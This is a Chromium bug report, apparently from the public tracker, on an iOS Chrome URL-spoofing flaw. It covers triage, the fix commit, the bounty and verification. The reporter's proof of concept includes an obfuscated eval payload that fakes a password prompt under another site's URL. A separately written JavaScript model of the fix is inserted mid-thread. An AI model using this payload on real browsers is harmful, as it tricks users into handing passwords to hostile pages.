
Issue 839822 link

Starred by 3 users

Issue metadata

Status: Verified
Owner:
Closed: May 2018
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: iOS
Pri: 1
Type: Bug-Security




Chrome URL spoofing vulnerability on IOS

Reported by evi1m0.bat@gmail.com, May 4 2018

Issue description

Steps to reproduce the problem:
1. Open url: https://server.n0tr00t.com/chrome/mobile_url_spoof.html
2. Click test <a> tag
3. We'll see the effect of a successful hijacking

What is the expected behavior?

What went wrong?
PoC:

```html
<html>
<head>
    <title>Chrome URL spoofing vulnerability on IOS</title>
    <!--
        author: evi1m0.bat[at]gmail.com
        datetime: 2018/05/03 00:16:27
        test version: for iPhone 66.0.3359.122
    -->
</head>
<script>
    pwn = () => {
        x = open('https://test.baidu.com', 'win');
        setTimeout(`
            x.document.write('<img src=@ onerror=eval(atob("dmFyIHB3ZD1wcm9tcHQoImh0dHBzOi8vdGVzdC5iYWlkdS5jb21cbmlucHV0IHlvdXIgcGFzc3dvcmRcbnRlc3QuLi4iKTtpZihwd2Qpe2FsZXJ0KCJwYXNzd29yZDogIitwd2QpfQ=="))><a href="https://google.com/" id="test">test</a>');
            `, 1000);
        setTimeout(`
            x.close();
            window.location='http://test.baidu.com';
            `, 1300);
    }
</script>
<h1>
    <a onclick="pwn()">ClickMe :-)</a>
</h1>
</html>
```

Did this work before? N/A 

Chrome version: 66.0.3359.122  Channel: stable
OS Version: 11.3.1
Flash Version: Shockwave Flash 29.0 r0
Attachment: 4201722.png (460 KB)
Components: Mobile>iOSWebView
Labels: M-67 Security_Severity-Medium Security_Impact-Stable
Owner: rohitrao@chromium.org
Assigning per ios owners, please feel free to re-assign as appropriate.
Cc: rohitrao@chromium.org
Owner: eugene...@chromium.org
+Eugene
Cc: pinkerton@chromium.org pkl@chromium.org noyau@chromium.org marq@chromium.org
And +CC leads
Components: -Mobile>iOSWebView Mobile>WebView>Glue
Labels: -Pri-2 Pri-1
Status: Assigned (was: Unconfirmed)
Cc: eugene...@chromium.org
Components: -Mobile>WebView>Glue UI>Browser>Core
There are 2 problems here:
1.) Alert dialog does not display the URL (https://test.baidu.com is part of the prompt, not the actual page URL)
2.) AlertPresenter fails to switch to the first tab (tab which requested the prompt)

Assigning to Kurt who owns alert presentation code.
Labels: -M-67 ReleaseBlock-Stable M-68
Owner: kkhorimoto@chromium.org
Sorry. Actually assigning to Kurt per comment #5.
Status: Started (was: Assigned)
I've created crrev.com/c/1058170 to prevent this from happening.  The solution I went with was to automatically suppress dialogs when there is no source URL for the request.  The request is being sent from the WKWebView corresponding with the child window, so from DialogPresenter's perspective, it is behaving correctly, as the correct WebState's content area is in the foreground Tab when the dialog is being shown.
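The two problems from comment #5 and the rule adopted in comment #7 can be modelled as a small presentation policy. The following is an added example, not Chromium's code: the function and field names (`decideDialog`, `webStateVisible`, `SAMPLE_REQUESTS`) are hypothetical, the sample requests are constructed, and the `defer` branch for a background WebState is an assumption that models problem 2 rather than anything the landed change does. What it shows is the fix's core idea: the dialog header is derived only from the requesting frame's URL, a request with no attributable http(s) source URL is suppressed outright, and text inside the prompt body (which in the PoC begins with a URL) never influences the attribution line.

```javascript
// Added example (not Chromium code): a model of the dialog-attribution policy
// discussed in this issue. Names are hypothetical; the 'defer' branch is an
// assumption modelling problem 2 from comment #5, not the landed fix.

const ALLOWED_SCHEMES = new Set(['http:', 'https:']);

// Returns the origin a dialog should be attributed to, or null when the
// request URL is missing, unparsable, or not a web origin (about:blank,
// javascript:, data:, ...). A null origin means the dialog cannot be
// attributed, which is the condition the fix treats as unsafe.
function dialogOrigin(requestURL) {
  if (typeof requestURL !== 'string' || requestURL.length === 0) return null;
  let url;
  try {
    url = new URL(requestURL);
  } catch (e) {
    return null;
  }
  if (!ALLOWED_SCHEMES.has(url.protocol)) return null;
  return url.origin;
}

// Decides whether a JavaScript dialog may be shown and how its header reads.
// request = { requestURL, message, webStateVisible }
function decideDialog(request) {
  const origin = dialogOrigin(request.requestURL);
  if (origin === null) {
    // Mirrors the fix's rule: no attributable source URL, no dialog.
    return { action: 'suppress', reason: 'missing or invalid request URL' };
  }
  if (!request.webStateVisible) {
    // Assumption: a dialog from a WebState that is not the foreground tab is
    // held back instead of being drawn over a different page's content.
    return { action: 'defer', reason: 'requesting WebState not in foreground' };
  }
  // The header comes from the URL origin only. The message body is shown as
  // plain text and cannot change the attribution line, so a message that
  // starts with "https://test.baidu.com" is still labelled with its real host.
  return {
    action: 'show',
    header: `${new URL(origin).host} says`,
    body: request.message,
  };
}

// Constructed sample requests (not captured from a device).
const SAMPLE_REQUESTS = [
  // Child window filled via document.write: the frame has no source request.
  { requestURL: '', message: 'https://test.baidu.com\ninput your password', webStateVisible: true },
  // about:blank is not an attributable web origin either.
  { requestURL: 'about:blank', message: 'hello', webStateVisible: true },
  // Ordinary page: shown, with the header taken from the URL, not the text.
  { requestURL: 'https://untrusted.example/page?x=1', message: 'https://test.baidu.com\ninput your password', webStateVisible: true },
  // Same page requesting a dialog while another tab is in the foreground.
  { requestURL: 'https://untrusted.example/page', message: 'hello', webStateVisible: false },
];

function runSamples() {
  return SAMPLE_REQUESTS.map(decideDialog);
}

for (const result of runSamples()) {
  console.log(JSON.stringify(result));
}
```

The point of keeping `dialogOrigin` separate from `decideDialog` is that the attribution question ("which origin is this dialog from?") is answered once, from data the page cannot author, before any text the page supplies is looked at; a presenter that builds the header from the message string, or that falls back to a default when the URL is empty, reintroduces the spoof.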
Comment 8 by bugdroid1@chromium.org (Project Member), May 15 2018

The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/c12ce092c44a325d78baaa9679ecfe7370fd1fe3

commit c12ce092c44a325d78baaa9679ecfe7370fd1fe3
Author: Kurt Horimoto <kkhorimoto@chromium.org>
Date: Tue May 15 01:51:27 2018

[iOS] Suppress dialogs with an invalid request URL

JavaScript dialogs depend on the frame's source request to populate
JavaScript alerts with host information so that the user is aware of
which page is showing the dialog.  If this information is unavailable,
it is unsafe to show the dialog to the user, as it could be used to
trick users into supplying data to a malicious page.

Bug:  839822 
Cq-Include-Trybots: master.tryserver.chromium.mac:ios-simulator-cronet;master.tryserver.chromium.mac:ios-simulator-full-configs
Change-Id: I351b93294179224d5a4ba1ee01d53104c124de8e
Reviewed-on: https://chromium-review.googlesource.com/1058170
Commit-Queue: Kurt Horimoto <kkhorimoto@chromium.org>
Reviewed-by: Eugene But <eugenebut@chromium.org>
Cr-Commit-Position: refs/heads/master@{#558581}
[modify] https://crrev.com/c12ce092c44a325d78baaa9679ecfe7370fd1fe3/ios/web/web_state/ui/crw_web_controller.mm

Status: Fixed (was: Started)
Comment 10 by sheriffbot@chromium.org (Project Member), May 15 2018

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Labels: reward-topanel
Labels: -reward-topanel reward-unpaid reward-1000
*** Boilerplate reminders! ***
Please do NOT publicly disclose details until a fix has been released to all our users. Early public disclosure may cancel the provisional reward. Also, please be considerate about disclosure when the bug affects a core library that may be used by other products. Please do NOT share this information with third parties who are not directly involved in fixing the bug. Doing so may cancel the provisional reward. Please be honest if you have already disclosed anything publicly or to third parties. Lastly, we understand that some of you are not interested in money. We offer the option to donate your reward to an eligible charity. If you prefer this option, let us know and we will also match your donation - subject to our discretion. Any rewards that are unclaimed after 12 months will be donated to a charity of our choosing.
*********************************
Nice one evi1m0.bat@, the Chrome VRP panel decided to award $1,000 for this report! A member of our finance team will be in touch to arrange payment. Also, how would you like to be credited in our release notes?
Labels: -reward-unpaid reward-inprocess
Thanks for the reward. Please credit: evi1m0 of Bilibili Security Team
Labels: -ReleaseBlock-Stable
Comment 17 by sheriffbot@chromium.org (Project Member), Jun 8

Labels: Merge-Request-68
Comment 18 by sheriffbot@chromium.org (Project Member), Jun 8

Labels: -Merge-Request-68 Hotlist-Merge-Review Merge-Review-68
This bug requires manual review: M68 has already been promoted to the beta branch, so this requires manual review
Please contact the milestone owner if you have questions.
Owners: cmasso@(Android), kariahda@(iOS), bhthompson@(ChromeOS), abdulsyed@(Desktop)

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Let's get canary verification on this.
Cc: srikanthg@chromium.org
Status: Verified (was: Fixed)
Verified on M69.0.3456.0 canary
iOS: 10.3.3, 12
Device: iPhone, iPad
Labels: -Hotlist-Merge-Review -Merge-Review-68 Merge-Approved-68
Approved!
Comment 23 by sheriffbot@chromium.org (Project Member), Jun 18

Cc: kariahda@chromium.org
This issue has been approved for a merge. Please merge the fix to any appropriate branches as soon as possible!

If all merges have been completed, please remove any remaining Merge-Approved labels from this issue.

Thanks for your time! To disable nags, add the Disable-Nags label.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: -Merge-Approved-68 Merge-Merged
The fix for this bug landed May 15, whereas M68 branched on May 24.  No merge is required here.
Labels: Release-0-M68
Comment 26 by sheriffbot@chromium.org (Project Member), Aug 21

Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: CVE-2018-6160 CVE_description-missing